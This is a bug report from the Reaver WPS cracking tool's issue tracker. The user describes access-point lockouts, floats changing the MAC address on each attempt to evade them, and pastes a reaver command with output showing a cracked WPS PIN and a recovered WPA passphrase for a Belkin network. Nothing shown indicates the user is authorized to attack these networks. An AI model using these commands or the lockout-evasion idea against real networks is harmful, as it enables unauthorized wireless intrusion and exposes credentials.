apm1007 / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

Locking me out after first attempt #615

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago

Answer the following questions for every issue submitted:

0. What version of Reaver are you using?  1.4

1. What operating system are you using (Linux is the only supported OS)? Kali

2. Is your wireless card in monitor mode (yes/no)? Yes

3. What is the signal strength of the Access Point you are trying to crack? 
~55dB

4. What is the manufacturer and model # of the device you are trying to
crack? Netgear WGR614

5. What is the entire command line string you are supplying to reaver?
reaver -i mon0 -b C0:3F:0E:BA:A4:34 -c 6 -vv -d 30

6. Please describe what you think the issue is.
I am not sure to be honest. It is only letting me try one pin before completely 
blocking my MAC, because when I change my mac it lets me try one more then 
nothing. I have tried limiting time to 30, 60, 90, nothing. I have RT3070 
drivers, packet injection and everything works. 

Question, I don't suppose there is a way to ifconfig/down both virtual mon and 
physical after each pin attempt and change the mac for every pin attempt? So 
far it would be faster than what I am doing now which is ntohing. I tried 
letting it 'run through' the errors, over night, when I woke up was still 
getting errors. 

To be honest I am not that familiar with Reaver, I just installed Kali, and so 
far there is more bugs in it than BT5 as far as wireless goes. Just weird 
little quirks that make things harder. 

7. Paste the output from Reaver below.

http://pastebin.com/Uj5aHhAQ

Original issue reported on code.google.com by techiejo...@gmail.com on 16 Feb 2014 at 8:58

GoogleCodeExporter commented 9 years ago
Sorry I didn't add this, I have tried multiple routers, all gives the same 
problem. Even tried a 7 year old Airlink haha.

Original comment by techiejo...@gmail.com on 16 Feb 2014 at 9:03

GoogleCodeExporter commented 9 years ago
Hah just got lucky with one... first PIN.

root@GoldenOrange:~# reaver -i mon0 -b 00:1C:DF:BB:3E:15 -c 6 -vv -d 30

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 00:1C:DF:BB:3E:15
[+] Associated with 00:1C:DF:BB:3E:15 (ESSID: Belkin_G_Wireless_BB3E15)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 34 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'sugar magnolia blossoms blooming'
[+] AP SSID: 'Belkin_G_Wireless_BB3E15'
[+] Nothing done, nothing to save.
root@GoldenOrange:~# 

Original comment by techiejo...@gmail.com on 16 Feb 2014 at 9:59